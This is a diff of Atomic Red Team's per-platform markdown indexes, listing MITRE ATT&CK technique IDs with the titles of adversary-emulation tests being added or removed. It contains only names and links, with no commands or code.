- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
atomics/Indexes/Indexes-Markdown/linux-index.md
+13 -25
View File
@@ -13,7 +13,6 @@
- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
- Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
- Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
- Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -224,7 +223,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -327,9 +326,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -414,8 +411,9 @@
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -466,15 +464,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -502,16 +498,14 @@
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- [T1568.002 Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md)
- Atomic Test #1: DGA Simulation (Python) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
@@ -722,7 +716,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -738,9 +732,7 @@
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
- Atomic Test #2: Device Driver Discovery (Linux) [linux]
- Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #23: Active Directory Domain Search [linux]
- Atomic Test #24: Account Enumeration with LDAPDomainDump [linux]
@@ -758,7 +750,6 @@
- Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl/service [linux]
- Atomic Test #8: System Service Discovery - Linux init scripts [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
@@ -800,9 +791,7 @@
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- Atomic Test #8: Identifying Network Shares - Linux [linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
@@ -907,8 +896,7 @@
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/macos-index.md
+15 -25
View File
@@ -13,7 +13,6 @@
- [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
- Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
- Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
- Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -180,7 +179,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -285,9 +284,7 @@
- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -364,9 +361,10 @@
- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -413,15 +411,13 @@
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
- Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -446,15 +442,14 @@
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
@@ -644,7 +639,7 @@
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Modify Authentication Process: Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -660,9 +655,7 @@
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1652 Device Driver Discovery](../../T1652/T1652.md)
- Atomic Test #4: List loaded kernel extensions (macOS) [macos]
- Atomic Test #5: Find Kernel Extensions (macOS) [macos]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [linux, macos]
@@ -676,8 +669,7 @@
- Atomic Test #7: Check if System Integrity Protection is enabled [macos]
- Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #5: System Service Discovery - macOS launchctl [macos]
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
@@ -712,8 +704,7 @@
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
- Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1654 Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
@@ -795,8 +786,7 @@
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #1: MITM Proxy Injection [macos, linux]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/office-365-index.md
+1 -1
View File
@@ -83,7 +83,7 @@
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Office Application Startup: Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+15 -37
View File
@@ -505,7 +505,6 @@
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
- Atomic Test #10: Execution from Compressed JScript File [windows]
- Atomic Test #11: Obfuscated PowerShell Command via Character Array [windows]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
@@ -563,8 +562,7 @@
- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -877,9 +875,7 @@
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
@@ -1110,15 +1106,11 @@
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
- Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
- Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
- Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
